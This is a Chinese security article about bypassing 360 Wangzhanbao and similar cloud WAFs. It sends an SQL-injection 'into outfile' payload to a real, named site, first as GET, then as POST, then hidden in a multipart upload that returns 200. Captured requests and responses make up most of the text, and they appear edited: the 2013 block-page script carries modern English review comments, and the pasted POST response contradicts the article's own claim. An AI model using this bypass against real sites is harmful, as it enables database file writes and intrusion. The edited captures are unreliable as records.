
360网站宝/安全宝/加速乐及其他类似产品防护绕过

来源:自学PHP网    时间:2015-04-15 14:59 作者: 阅读:

[导读] 360网站宝等云waf产品在实现的时候存在问题可以导致安全策略绕过在对GET请求处理的时候都能够识别攻击,但是一旦换成了POST请求或者是改造过的POST就不存在此问题了GET index php?id=1%2...

360网站宝等云WAF产品在实现上存在问题,可导致安全策略被绕过。
 
处理GET请求时能够识别攻击;但一旦换成POST请求,或者改造过的POST(如下文的文件上传形式),就不再被拦截了。
 
GET /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1

Host: www.xiangshu.com

Connection: keep-alive

Content-Length: 1778



HTTP/1.1 493

Server: nginx/1.2.9

Date: Thu, 28 Nov 2013 12:21:35 GMT

Content-Type: text/html

Content-Length: 5538

Connection: keep-alive

X-Powered-By-360WZB: wangzhan.360.cn



<!DOCTYPE html>

<html>

<head> 

<title>禁止访问</title>

<meta charset="utf-8" />

<meta name="author" content="" />

<meta name="keywords" content="" />

<meta name="description" content="" />

<style>

body{margin:0; padding:0;text-align: center;font-family:"微软雅黑" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;}

div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;}

h1{font-size:22px;  line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;}

.wrap{width:715px; margin:50px auto;}

.waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; }

.waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}

.waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}

.waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;}

.main{border:1px solid #D0D0D0; border-radius:10px;}

.warning-domain{padding:10px 20px;}

.warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;}

.warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;}

.warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;}

.warning-conlist dl{position:relative;}

.warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;}

.warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;}

.warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;}

</style>

</head>

<body>

<div class="wrap">

<h1 class="waring-tips1"><p>禁止访问</p></h1>

<div class="main">

<dl class="warning-domain">

<dt id="host"></dt>

<dd>您提交的请求存在危险内容,已被网站卫士拦截!</dd>

</dl>

<div class="warning-conlist">

<dl>

<dt>拦截网址:</dt>

<dd id="wurl">&nbsp;</dd>

</dl>

<dl>

<dt>拦截时间:</dt>

<dd id="wdate">2013-03-28 16:19:25</dd>

</dl>

<dl style="margin-bottom:10px; border-bottom:1px solid #ccc">

<dt>处理结果:</dt>

<dd>IP已被记录并提交至网络监察部门备案!</dd>

</dl>

            <p>如果您是站长,要继续访问网址,请进入<a href="javascript:void(0);" onclick="tongdao()" style="color:green">[站长绿色通道]</a></p>

<p >(站长绿色通道:网站卫士会自动将当前被拦截的URL加入防火墙白名单,在3小时之内该URL不进行安全检测)</p>

</div>

</div>

</div>

<script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script>

<script type="text/javascript">



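/**
 * Minimal Base64 encoder used by the block page to pack the blocked URL
 * into a query-string value.
 *
 * Usage: new Base64().encode(text)
 *
 * The alphabet and the UTF-8 helper are closure-local. The original assigned
 * them without `var`, which leaked two implicit globals and throws a
 * ReferenceError under strict mode / ES modules.
 */
function Base64() {
  // Standard Base64 alphabet; index 64 ("=") is the padding character.
  var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

  /**
   * Turn a UTF-16 JavaScript string into a string whose char codes are the
   * UTF-8 bytes of the input. CRLF is normalised to LF first, as before.
   *
   * @param {string} string - text to convert
   * @returns {string} one character per UTF-8 byte
   */
  function utf8Encode(string) {
    var text = string.replace(/\r\n/g, "\n");
    var utftext = "";
    for (var n = 0; n < text.length; n++) {
      var c = text.charCodeAt(n);

      // A valid surrogate pair is one code point above U+FFFF and must be
      // emitted as a single 4-byte sequence, not as two 3-byte sequences.
      if (c >= 0xd800 && c <= 0xdbff && n + 1 < text.length) {
        var low = text.charCodeAt(n + 1);
        if (low >= 0xdc00 && low <= 0xdfff) {
          c = 0x10000 + ((c - 0xd800) << 10) + (low - 0xdc00);
          n++;
        }
      }

      if (c < 128) {
        utftext += String.fromCharCode(c);
      } else if (c < 2048) {
        utftext += String.fromCharCode((c >> 6) | 192);
        utftext += String.fromCharCode((c & 63) | 128);
      } else if (c < 65536) {
        utftext += String.fromCharCode((c >> 12) | 224);
        utftext += String.fromCharCode(((c >> 6) & 63) | 128);
        utftext += String.fromCharCode((c & 63) | 128);
      } else {
        utftext += String.fromCharCode((c >> 18) | 240);
        utftext += String.fromCharCode(((c >> 12) & 63) | 128);
        utftext += String.fromCharCode(((c >> 6) & 63) | 128);
        utftext += String.fromCharCode((c & 63) | 128);
      }
    }
    return utftext;
  }

  /**
   * Base64-encode a string (UTF-8 bytes of the text, standard alphabet,
   * "=" padding).
   *
   * @param {string} input - text to encode; must be a string
   * @returns {string} Base64 text
   */
  this.encode = function (input) {
    var output = "";
    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    var i = 0;
    var bytes = utf8Encode(input);

    while (i < bytes.length) {
      // charCodeAt() past the end yields NaN; the bit operations below treat
      // NaN as 0 and the isNaN() checks then switch to padding.
      chr1 = bytes.charCodeAt(i++);
      chr2 = bytes.charCodeAt(i++);
      chr3 = bytes.charCodeAt(i++);

      enc1 = chr1 >> 2;
      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
      enc4 = chr3 & 63;

      if (isNaN(chr2)) {
        enc3 = enc4 = 64;
      } else if (isNaN(chr3)) {
        enc4 = 64;
      }

      output = output +
        keyStr.charAt(enc1) + keyStr.charAt(enc2) +
        keyStr.charAt(enc3) + keyStr.charAt(enc4);
    }
    return output;
  };
}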





/**
 * HTML-escape a string by letting the browser serialise it: the text is
 * assigned to a detached <div> as plain text and read back as markup.
 *
 * @param {string} html - raw text to escape
 * @returns {string} the element's innerHTML after the text was assigned
 */
function HTMLEncode(html) {
  var scratch = document.createElement("div");
  // Use textContent when the element exposes it, otherwise fall back to
  // innerText.
  if (scratch.textContent != null) {
    scratch.textContent = html;
  } else {
    scratch.innerText = html;
  }
  return scratch.innerHTML;
}

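// Fill in the block page's placeholders once the DOM is ready.
$(document).ready(function () {
  $("#host").text(location.hostname);

  // .text() inserts its argument as a text node, so the URL is already
  // rendered inertly. Running it through HTMLEncode() first escaped it twice
  // and made entities such as "&amp;" appear literally in the shown address.
  $("#wurl").text(location.href);

  // Replace the static timestamp in the markup with the visitor's local time.
  $("#wdate").text(new Date().toLocaleString());
});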



/**
 * Navigate to the feedback page, passing the current hostname as the whole
 * query string.
 */
function wubao() {
  location.href = "fankui.html?" + location.hostname;
}



/**
 * "Webmaster green channel" handler: send the visitor to the
 * wangzhan.360.cn authorisation URL, passing the current hostname in the
 * path and the Base64 of the current address (query string removed) as `url`.
 */
function tongdao() {
  var siteHost = location.hostname;

  // NOTE(review): the address is HTML-escaped before being cut and encoded;
  // entity escaping is an HTML concern, not a URL one. Kept as in the original.
  var pageUrl = HTMLEncode(location.href);

  // Drop everything from the first "?" onwards.
  var queryStart = pageUrl.indexOf("?");
  if (queryStart > 0) {
    pageUrl = pageUrl.substr(0, queryStart);
  }

  var encodedUrl = new Base64().encode(pageUrl);

  // NOTE(review): the Base64 text is appended without URL-encoding, so "+",
  // "/" and "=" travel raw in the query string. Confirm the receiving
  // endpoint tolerates that.
  location.href = "http://wangzhan.360.cn/index/shouquan/host/" + siteHost + "/?url=" + encodedUrl;
}



</script>

<script type="text/javascript">



  // Google Analytics (ga.js) command queue: reuse an existing queue if one is
  // already defined, then record the account id and a page view.
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-32745158-2']);
  _gaq.push(['_trackPageview']);

  // Inject the ga.js loader asynchronously ahead of the first <script> tag,
  // choosing the host prefix that matches the page's protocol.
  (function () {
    var tracker = document.createElement('script');
    tracker.type = 'text/javascript';
    tracker.async = true;

    var prefix = 'https:' == document.location.protocol ? 'https://ssl' : 'http://www';
    tracker.src = prefix + '.google-analytics.com/ga.js';

    var firstScript = document.getElementsByTagName('script')[0];
    firstScript.parentNode.insertBefore(tracker, firstScript);
  })();



</script>

</body>

</html>


 

 
 
 
 
 
 
换成
 
 
 
POST /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1

Host: www.xiangshu.com

Connection: keep-alive

Content-Length: 1778



HTTP/1.1 493

Server: nginx/1.2.9

Date: Thu, 28 Nov 2013 12:22:04 GMT

Content-Type: text/html

Content-Length: 5538

Connection: keep-alive

X-Powered-By-360WZB: wangzhan.360.cn



<!DOCTYPE html>

<html>

<head> 

<title>禁止访问</title>

<meta charset="utf-8" />

<meta name="author" content="" />

<meta name="keywords" content="" />

<meta name="description" content="" />

<style>

body{margin:0; padding:0;text-align: center;font-family:"微软雅黑" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;}

div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;}

h1{font-size:22px;  line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;}

.wrap{width:715px; margin:50px auto;}

.waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; }

.waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}

.waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}

.waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;}

.main{border:1px solid #D0D0D0; border-radius:10px;}

.warning-domain{padding:10px 20px;}

.warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;}

.warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;}

.warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;}

.warning-conlist dl{position:relative;}

.warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;}

.warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;}

.warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;}

</style>

</head>

<body>

<div class="wrap">

<h1 class="waring-tips1"><p>禁止访问</p></h1>

<div class="main">

<dl class="warning-domain">

<dt id="host"></dt>

<dd>您提交的请求存在危险内容,已被网站卫士拦截!</dd>

</dl>

<div class="warning-conlist">

<dl>

<dt>拦截网址:</dt>

<dd id="wurl">&nbsp;</dd>

</dl>

<dl>

<dt>拦截时间:</dt>

<dd id="wdate">2013-03-28 16:19:25</dd>

</dl>

<dl style="margin-bottom:10px; border-bottom:1px solid #ccc">

<dt>处理结果:</dt>

<dd>IP已被记录并提交至网络监察部门备案!</dd>

</dl>

            <p>如果您是站长,要继续访问网址,请进入<a href="javascript:void(0);" onclick="tongdao()" style="color:green">[站长绿色通道]</a></p>

<p >(站长绿色通道:网站卫士会自动将当前被拦截的URL加入防火墙白名单,在3小时之内该URL不进行安全检测)</p>

</div>

</div>

</div>

<script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script>

<script type="text/javascript">



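/**
 * Minimal Base64 encoder used by the block page to pack the blocked URL
 * into a query-string value.
 *
 * Usage: new Base64().encode(text)
 *
 * The alphabet and the UTF-8 helper are closure-local. The original assigned
 * them without `var`, which leaked two implicit globals and throws a
 * ReferenceError under strict mode / ES modules.
 */
function Base64() {
  // Standard Base64 alphabet; index 64 ("=") is the padding character.
  var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

  /**
   * Turn a UTF-16 JavaScript string into a string whose char codes are the
   * UTF-8 bytes of the input. CRLF is normalised to LF first, as before.
   *
   * @param {string} string - text to convert
   * @returns {string} one character per UTF-8 byte
   */
  function utf8Encode(string) {
    var text = string.replace(/\r\n/g, "\n");
    var utftext = "";
    for (var n = 0; n < text.length; n++) {
      var c = text.charCodeAt(n);

      // A valid surrogate pair is one code point above U+FFFF and must be
      // emitted as a single 4-byte sequence, not as two 3-byte sequences.
      if (c >= 0xd800 && c <= 0xdbff && n + 1 < text.length) {
        var low = text.charCodeAt(n + 1);
        if (low >= 0xdc00 && low <= 0xdfff) {
          c = 0x10000 + ((c - 0xd800) << 10) + (low - 0xdc00);
          n++;
        }
      }

      if (c < 128) {
        utftext += String.fromCharCode(c);
      } else if (c < 2048) {
        utftext += String.fromCharCode((c >> 6) | 192);
        utftext += String.fromCharCode((c & 63) | 128);
      } else if (c < 65536) {
        utftext += String.fromCharCode((c >> 12) | 224);
        utftext += String.fromCharCode(((c >> 6) & 63) | 128);
        utftext += String.fromCharCode((c & 63) | 128);
      } else {
        utftext += String.fromCharCode((c >> 18) | 240);
        utftext += String.fromCharCode(((c >> 12) & 63) | 128);
        utftext += String.fromCharCode(((c >> 6) & 63) | 128);
        utftext += String.fromCharCode((c & 63) | 128);
      }
    }
    return utftext;
  }

  /**
   * Base64-encode a string (UTF-8 bytes of the text, standard alphabet,
   * "=" padding).
   *
   * @param {string} input - text to encode; must be a string
   * @returns {string} Base64 text
   */
  this.encode = function (input) {
    var output = "";
    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    var i = 0;
    var bytes = utf8Encode(input);

    while (i < bytes.length) {
      // charCodeAt() past the end yields NaN; the bit operations below treat
      // NaN as 0 and the isNaN() checks then switch to padding.
      chr1 = bytes.charCodeAt(i++);
      chr2 = bytes.charCodeAt(i++);
      chr3 = bytes.charCodeAt(i++);

      enc1 = chr1 >> 2;
      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
      enc4 = chr3 & 63;

      if (isNaN(chr2)) {
        enc3 = enc4 = 64;
      } else if (isNaN(chr3)) {
        enc4 = 64;
      }

      output = output +
        keyStr.charAt(enc1) + keyStr.charAt(enc2) +
        keyStr.charAt(enc3) + keyStr.charAt(enc4);
    }
    return output;
  };
}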





/**
 * HTML-escape a string by letting the browser serialise it: the text is
 * assigned to a detached <div> as plain text and read back as markup.
 *
 * @param {string} html - raw text to escape
 * @returns {string} the element's innerHTML after the text was assigned
 */
function HTMLEncode(html) {
  var scratch = document.createElement("div");
  // Use textContent when the element exposes it, otherwise fall back to
  // innerText.
  if (scratch.textContent != null) {
    scratch.textContent = html;
  } else {
    scratch.innerText = html;
  }
  return scratch.innerHTML;
}

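// Fill in the block page's placeholders once the DOM is ready.
$(document).ready(function () {
  $("#host").text(location.hostname);

  // .text() inserts its argument as a text node, so the URL is already
  // rendered inertly. Running it through HTMLEncode() first escaped it twice
  // and made entities such as "&amp;" appear literally in the shown address.
  $("#wurl").text(location.href);

  // Replace the static timestamp in the markup with the visitor's local time.
  $("#wdate").text(new Date().toLocaleString());
});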



/**
 * Navigate to the feedback page, passing the current hostname as the whole
 * query string.
 */
function wubao() {
  location.href = "fankui.html?" + location.hostname;
}



/**
 * "Webmaster green channel" handler: send the visitor to the
 * wangzhan.360.cn authorisation URL, passing the current hostname in the
 * path and the Base64 of the current address (query string removed) as `url`.
 */
function tongdao() {
  var siteHost = location.hostname;

  // NOTE(review): the address is HTML-escaped before being cut and encoded;
  // entity escaping is an HTML concern, not a URL one. Kept as in the original.
  var pageUrl = HTMLEncode(location.href);

  // Drop everything from the first "?" onwards.
  var queryStart = pageUrl.indexOf("?");
  if (queryStart > 0) {
    pageUrl = pageUrl.substr(0, queryStart);
  }

  var encodedUrl = new Base64().encode(pageUrl);

  // NOTE(review): the Base64 text is appended without URL-encoding, so "+",
  // "/" and "=" travel raw in the query string. Confirm the receiving
  // endpoint tolerates that.
  location.href = "http://wangzhan.360.cn/index/shouquan/host/" + siteHost + "/?url=" + encodedUrl;
}



</script>

<script type="text/javascript">



  // Google Analytics (ga.js) command queue: reuse an existing queue if one is
  // already defined, then record the account id and a page view.
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-32745158-2']);
  _gaq.push(['_trackPageview']);

  // Inject the ga.js loader asynchronously ahead of the first <script> tag,
  // choosing the host prefix that matches the page's protocol.
  (function () {
    var tracker = document.createElement('script');
    tracker.type = 'text/javascript';
    tracker.async = true;

    var prefix = 'https:' == document.location.protocol ? 'https://ssl' : 'http://www';
    tracker.src = prefix + '.google-analytics.com/ga.js';

    var firstScript = document.getElementsByTagName('script')[0];
    firstScript.parentNode.insertBefore(tracker, firstScript);
  })();



</script>

</body>

</html>

 

 
 
 
即不拦(注:上面贴出的这次POST响应仍是 493 拦截页,与“不拦”的说法不符,原文的抓包可能贴错;下文文件上传形式的请求才返回 200)
 
 
 
如果还拦,就换成文件上传(multipart/form-data)的方式:
 
 
 
------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7

Content-Disposition: form-data; name="folder"



/blog/

------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7

Content-Disposition: form-data; name="id"



1%20into%20outfile%20'/tmp/abc'




HTTP/1.1 200 OK

Server: nginx/1.2.9

Date: Thu, 28 Nov 2013 12:22:23 GMT

Content-Type: text/html

Connection: keep-alive

X-Powered-By-360WZB: wangzhan.360.cn

X-Powered-By: PHP/5.2.13

Content-Length: 6258



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<link rel="stylesheet" type="text/css" href="/css/main.css" />

<script type="text/javascript" src="/assets/b043222/jquery.js"></script>

<script type="text/javascript" src="/css/cycle.js"></script>

<title>橡树摄影网-中国橡树摄影爱好者俱乐部 www.xiangshu.com</title>

<meta name="Description" content="橡树摄影网 www.xiangshu.com 中国规模最大的摄影俱乐部" />

<link rel="shortcut icon" href="http://www.xiangshu.com/images/xiangshu.ico" />

</head>



<body>



<div id="wrap">

    <div id="header">

        <div id="logo">

            <div id="logopic"><a href=http://www.xiangshu.com/club/0><img src=http://www.2cto.com/uploadfile/2014/0113/20140113105359402.jpg border=0></a></div>

            <h1>中国规模最大的摄影俱乐部</h1> 

        </div>

       



<div id="club"><a href="/club/0">总站</a> <a style="font-size:12px;font-weight:normal;color:red" href="/site/club"> [换城市]</a>

</div>









        <div id="banner">

       



<div id="enter">



<a href=http://www.xiangshu.com/read.php?tid=1004568>网站热线电话:400-100-8885</a>   |    <a href=http://www.gxsyxy.com target="_blank">光线摄影学院</a>   |  <a href=http://www.xiangshu.com/club/0>总站首页入口</a>



</div>

    

  <div class="clear"></div>

            <div id="subnav">

                <ul>

                    <li style="background:#006600"><a href=http://www.xiangshu.com/joining.php>注册免费会员</a></li>

                    <li style="background:#99CC00"><a href=http://www.xiangshu.com/read.php?tid=1004568>申请VIP会员</a>

</li>

                    <li style="background:#FF9900"><a href=http://www.xiangshu.com/membercard.php>捆绑会员卡</a></li>

                    <li style="background:#666666"><a href=http://www.xiangshu.com/about/7>景点合作和案例</a>

</li>

                </ul>

            </div>

        </div>

    </div>



    <div id="nav">

        <div id="nav_l"></div>

        <div id="nav_bg">

            <ul>

                <li><a href=http://www.xiangshu.com/pic/1>人 文</a></li>

                <li>|</li>

                <li><a href=http://www.xiangshu.com/pic/2>风 光</a></li>

                <li>|</li>

                <li><a href=http://www.xiangshu.com/pic/3>美 女</a></li>

                <li>|</li>

                <li><a href=http://www.xiangshu.com/pic/4>创 意</a></li>

                <li>|</li>

                <li><a href=http://www.xiangshu.com/thread.php?fid=2>摄影社区</a></li>

<li>|</li>

                <li><a href=http://www.xiangshu.com/thread.php?fid=64>驴友专区</a></li>

                <li class="btn"><a href=http://www.xiangshu.com/site/club>更换城市分站</a></li>

            </ul>

        </div>

        <div id="nav_r"></div>

    </div>



    <div id="main">

    <div id="index_top"></div>

    <div id="index_bg">

        <div id="flash">

                        <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src=http://www.2cto.com/uploadfile/2014/0113/20140113105359874.jpg" alt="进入其他城市可看更多当地精华图片" /></a>                <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src=http://www.2cto.com/uploadfile/2014/0113/20140113105359659.jpg" alt="进入其他城市可看更多当地精华图片" /></a>                        </div>

        <div id="map">

            <div id="iframe"><iframe marginWidth="0" marginHeight="0" frameSpacing="0" src="http://www.xiangshu.com/map/" frameBorder="0" width="300" scrolling="no" height="242"></iframe></div>

            <div id="news">

                <div id="news_tit"><span class="left">总站公告</span><span class="right">从地图进俱乐部 [<a href=club.html>文字入口</a>] </span></div>

                <div id="news_list">

                    <ul>

                                                <li>

                            <dl>

                                <dt><a target="_blank" href="/article/view/id/62">热烈庆祝橡树摄影网创办9周年[十月二十六]</a></dt>

                                <dd>[10-20]</dd>

                            </dl>

                        </li>

                                                <li>

                            <dl>

                                <dt><a target="_blank" href="/article/view/id/61">橡树网代表应邀出席中国神农架博客邀请赛</a></dt>

                                <dd>[06-09]</dd>

                            </dl>

                        </li>

                                                <li>

                            <dl>

                                <dt><a target="_blank" href="/article/view/id/60">关于委托唐瑞先生赴景区洽谈合作的声明</a></dt>

                                <dd>[04-19]</dd>

                            </dl>

                        </li>

                                                <li>

                            <dl>

                                <dt><a target="_blank" href="/article/view/id/59">网站升级:图片质量上升到500K,开放外链</a></dt>

                                <dd>[03-06]</dd>

                            </dl>

                        </li>

                                                <li>

                            <dl>

                                <dt><a target="_blank" href="/article/view/id/58">橡树网副总裁和木王国家森林公园签约</a></dt>

                                <dd>[12-21]</dd>

                            </dl>

                        </li>

                                            </ul>

                </div>

            </div>

        </div>

    </div>

    <div id="index_bottom"></div>

</div>



    <div id="hezuo">

 <a href=http://www.xiangshu.com/about/6>关于橡树</a> - <a href=http://www.xiangshu.com/about/8>联系我们</a> - <a href=http://www.xiangshu.com/link>友情链接</a>  [粤ICP备11037153号]

</div> 

  



</body>

</html>

 

 
就不拦了......也就是说,同一载荷仅因请求方法或请求体编码方式不同就未被检测;防护规则应当对所有请求方法一致地检查URL、请求头和请求体(包括 multipart 的各个字段)。
 
